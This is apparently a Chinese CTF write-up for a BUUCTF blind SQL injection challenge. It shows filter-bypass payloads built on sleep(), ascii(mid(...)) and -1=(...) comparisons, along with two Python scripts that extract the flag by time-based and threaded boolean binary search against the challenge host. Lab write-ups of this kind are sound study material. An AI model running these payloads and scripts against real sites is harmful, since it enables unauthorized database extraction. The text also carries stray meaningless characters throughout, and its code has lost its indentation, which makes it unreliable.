首先用sqlmap跑一跑沒(méi)有結(jié)果
嘗試輸入扰藕,測(cè)試注入點(diǎn)和過(guò)濾
1' bool(false)
1'# SQL Injection Checked.
1'%23 bool(false)
1' %23 Injection Checked.
1%23 Hello, glzjin wants a girlfriend.
可以發(fā)現(xiàn),只要被過(guò)濾了就會(huì)顯示SQL Injection Checked芳撒,通過(guò)測(cè)試
過(guò)濾了and&&邓深、 or||、 空格 笔刹、# 芥备、for、limit
明顯的注入,但是過(guò)濾空格,*,%23%0a,limit,for等等,明顯的盲注
通過(guò)測(cè)試sleep((select(flag)from(flag)where(flag)like('f%'))like('f%'))可以成功延時(shí),構(gòu)造腳本
過(guò)濾空格,*,%23%0a,limit,for
后面再回頭想了一下,flag表就一條數(shù)據(jù),不能用limit也不需要用like構(gòu)造的這么復(fù)雜,可以構(gòu)造sleep(ascii(mid((select(flag)from(flag)),1,1))=102)
然后看glzjin師傅的wp卻是布爾型盲注
1^(cot(ascii(mid((select(flag)from(flag)),1,1))=102))^1
其中的cot函數(shù)的作用是求余切值,會(huì)得到0.6這樣,最后通過(guò)異或和四舍五入最后為1(我也不是很懂為什么一定要cot)
這里講一下like
例子
我們希望從上面的 "Persons" 表中選取居住在以 "N" 開(kāi)始的城市里的人:
我們可以使用下面的 SELECT 語(yǔ)句:
SELECT * FROM Persons
WHERE City LIKE 'N%'
提示:"%" 可用于定義通配符(模式中缺少的字母)舌菜。
sqlmap中也有用like代替=
圖片.png
圖片.png
代碼
import requests
def six_six_six(url):
flag = ''
while True:
for i in 'abcdefghijklmnopqrstuvwxyz0123456789{}_':
data = {'id':"sleep((select(flag)from(flag)where(flag)like('f%'))like('{i}%'))".format(i=flag+i)}
print(data)
try:
requests.post(url=url,data=data,timeout=1)
except:
flag=flag+i
print('[*]%s'%flag)
break
if i=='}':
break
print('[+]%s'%flag)
url = 'http://web43.buuoj.cn'
six_six_six(url)
還可以通過(guò)布爾盲注進(jìn)行,有兩種返回結(jié)果
-1=(ascii(substr((select flag from flag),1,1))>120)
我比較菜雞萌壳,一開(kāi)始怎么也看不出這個(gè)腳本的意思,經(jīng)過(guò)一波測(cè)試
-1=(158=58) 返回Hello, glzjin wants a girlfriend.
-1=(58=58)返回Error Occured When Fetch Result.
-1=(158>58)返回Error Occured When Fetch Result.
-1=(158<58) 返回Hello, glzjin wants a girlfriend.
還是不太懂為什么這么構(gòu)造日月,
這里可以揣摩出大概意思是()里的判斷為true返回Error Occured When Fetch Result.(也就是flase)袱瓮;
()里的判斷為flase返回Hello, glzjin wants a girlfriend.也就是id=1查詢出的內(nèi)容(也就是true)
原因是-1=flase,返回1爱咬?
-1=true懂讯,返回flase?
這樣看來(lái)確實(shí)沒(méi)有必要用and和or了
上腳本
import requests, threading
z = {}
def fast(n):
R, L = 126, 30
m = 0
while R >= L:
m = (R + L) // 2
#payload = '-1=(ascii(substr((select flag from flag),{0},1))>{1})'.format(n, m)
payload = '-1=(ascii(mid((select(flag)from(flag)),{0},1))>{1})'.format(n, m)
data = {"id": payload}
if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php",data).content.decode('utf8'):
payload = '-1=(ascii(substr((select flag from flag),{0},1))={1})'.format(n, m + 1)
data = {"id": payload}
#如果不返回Hello, glzjin wants a girlfriend台颠,語(yǔ)句為真褐望,ascii(flag[n])>m,構(gòu)造判斷ascii(flag[n])=m+1?
if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php",data).content.decode('utf8'):
z[n] = chr(m + 1)
print(chr(m + 1))
break
#如果不返回Hello, glzjin wants a girlfriend串前,語(yǔ)句為真瘫里,返回flag[n],break,跳出
L = m + 1#直到R>L,這里L(fēng)每次增加到m+1,二分法
print(m)
else:
payload = '-1=(ascii(substr((select flag from flag),{0},1))={1})'.format(n, m - 1)
data = {"id": payload}
if "Hello, glzjin wants a girlfriend." not in requests.post("http://web43.buuoj.cn/index.php",data).content.decode('utf8'):
z[n] = chr(m - 1)
print(chr(m - 1))
break
R = m - 1
a = []#創(chuàng)建threads數(shù)組a[]
for x in range(1, 39):#這里的39需要自己測(cè)試荡碾,從小到大測(cè)試
a.append(threading.Thread(target=fast, args=(x,)))#創(chuàng)建線程,使用threading.Thread()方法谨读,在這個(gè)方法中調(diào)用fast方法target=fast,args方法對(duì)fast進(jìn)行傳參坛吁。 把創(chuàng)建好的線程裝到threads數(shù)組a[]中劳殖。
for x in a:
x.start()#最后通過(guò)for循環(huán)遍歷線程數(shù)組铐尚。
for x in a:
x.join()#join()的作用是,在子線程完成運(yùn)行之前哆姻,這個(gè)子線程的父線程將一直被阻塞宣增。注意: join()方法的位置是在for循環(huán)外的,也就是說(shuō)必須等待for循環(huán)里的兩個(gè)進(jìn)程都結(jié)束后矛缨,才去執(zhí)行主進(jìn)程爹脾。
f = ''
for x in range(1, 39):
f += z[x]
print(f)
print('ok')
參考文章
http://118.25.174.93/index.php/archives/694/#Hack%20World
http://cdusec.happyhacking.top/?post=78
